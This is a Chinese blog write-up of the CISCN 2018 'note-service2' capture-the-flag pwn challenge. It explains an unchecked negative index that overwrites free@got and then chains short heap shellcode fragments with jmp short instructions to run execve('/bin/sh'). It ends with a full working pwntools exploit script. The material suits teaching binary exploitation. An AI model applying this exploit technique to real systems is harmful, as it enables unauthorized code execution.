CISCN-2018-Quals-note-service2
CISCN-2018-Quals-note-service2
总结
做完这道题,收获如下:
- 1)汇编语句
jmp short s,最后编译出来的机器码为\xEB\x??,问号代表pc寄存器会往前或往后跳转x个字节,x的范围为-128~127。要从??结束后算起。正数往前跳,负数往回跳。 - 2)修改某个函数的
got表地址后,可以将目标地址填充为一段shellcode,如果是在堆上,那么需要借助jmp short指令。算好偏移。 - 3)
mov rsi, 0比xor rsi, rsi要长,尽量用后面的。 - 4)
mov rax, 0x3b比mov eax, 0x3b要长,如果长度有限制就用后面的。
Checksec

发现关闭了NX,可能要利用shellcode。
题目分析
首先把附件放在IDA中打开,发现是个菜单题:
main:

sub_E30:

menu:

add_note:

可以看到,没有检查idx是否合法,可以在任意地址写一个对地址。
注意:如果申请的大小为8,最多只能写7个字节。

delete_note:

选项2和选项3并没有什么用。
由于程序关闭了堆栈不可执行,因此可以考虑修改某一个函数got表的内容为堆地址,在堆上写shellcode。
解题思路
尝试的解题思路
-
发现有
UAF漏洞,看能不能从UAF入手,泄露出libc的基地址或程序的基地址。然后,一顿思考后,发现程序没有edit,没有show,还只让输入8个字节,这就有点难搞。所以这个思路不太行。 -
由于在
add_note中,没有校验输入的idx,所以是可以修改func@got的内容的,填充为一个堆地址。但是只让写7个字节,啥shellcode会这么短啊······谷歌后,发现一个gadget叫jmp short,可以拼接跳转执行,再加上一些滑板指令,就能拼凑出完整的shellcode。这里需要注意,只让写
7个字节,所以指令的机器码不能太长,用xor代替mov,用mov eax, 0x3b代替mov rax , 0x3b。还有jmp short的机器码是\xEB,后面直接接一个偏移。偏移要算上后面的8个字节,加上下一个chunk的pre_size和size,所以一共是1+8+8+8=0x19。也就是说前面填满5个字节,接一个\xEB\x19即可。
最终解题思路
- 1)申请一块内存大小为8,内容
/bin/sh - 2)修改
free@got的内容为堆地址 - 3)利用
jmp short s往连续的几块chunk写入shellcode,shellcode为执行execve的系统调用。除去pop rdi; ret。因为free(ptr),会自动mov rdi, ptr。 - 4)调用
delete_note,释放前面的/bin/sh的内存块
编写EXP
首先把函数写好:
def add_note(idx:int, size:int, content:bytes=b'\x00'):
global io
io.sendlineafter("your choice>> ", '1')
io.sendlineafter("index:", str(idx))
io.sendlineafter("size:", str(size))
io.sendlineafter("content:", content)
def delete_note(idx:int):
global io
io.sendlineafter("your choice>> ", '4')
io.sendlineafter("index:", str(idx))
首先分配一块带有/bin/sh的,预备调用。然后,往索引为-17处分配,修改free@got的内容为堆地址,顺便写上一条shellcode,xor rsi, rsi。这里选用\x0c作为滑板指令。
add_note(0, 8, b'/bin/sh')
add_note(-17 , 8, asm('xor rsi, rsi') + b'\x0C\x0C\xEB\x19')
-17的计算是这样的:

可以看到,free@got的偏移为0x202018,题目中存储堆地址起始位置为0x2020a0,所以索引就是(0x202018 - 0x2020a0) // 8 = -17。
这里给出申请前后free@got的内容变化:
申请前:

申请后:

可以看到,free@got已修改成功,同时写上了xor rsi,rsi; \x0c\x0c\xeb\x19。
然后继续写:
add_note(1, 8, asm('xor rdx, rdx') + b'\x0C\x0C\xEB\x19')
add_note(2, 8, asm('mov eax, 59') + b'\xEB\x19')
add_note(4, 8, asm('syscall'))
之后就会:

最后:
delete_note(0) # get shell

完整exp
from pwn import *
io = process('./note')
context.update(arch='amd64', os='linux', endian='little')
def add_note(idx:int, size:int, content:bytes=b'\x00'):
global io
io.sendlineafter("your choice>> ", '1')
io.sendlineafter("index:", str(idx))
io.sendlineafter("size:", str(size))
io.sendlineafter("content:", content)
def delete_note(idx:int):
global io
io.sendlineafter("your choice>> ", '4')
io.sendlineafter("index:", str(idx))
# 利用 jmp short s指令写shellcode
# 修改free@got处地址为堆地址
add_note(0, 8, b'/bin/sh')
add_note(-17 , 8, asm('xor rsi, rsi') + b'\x0C\x0C\xEB\x19')
add_note(1, 8, asm('xor rdx, rdx') + b'\x0C\x0C\xEB\x19')
add_note(2, 8, asm('mov eax, 59') + b'\xEB\x19')
add_note(4, 8, asm('syscall'))
delete_note(0)
io.interactive()
本文来自博客园,作者:LynneHuan,转载请注明原文链接:https://www.cnblogs.com/LynneHuan/p/14427269.html

浙公网安备 33010602011771号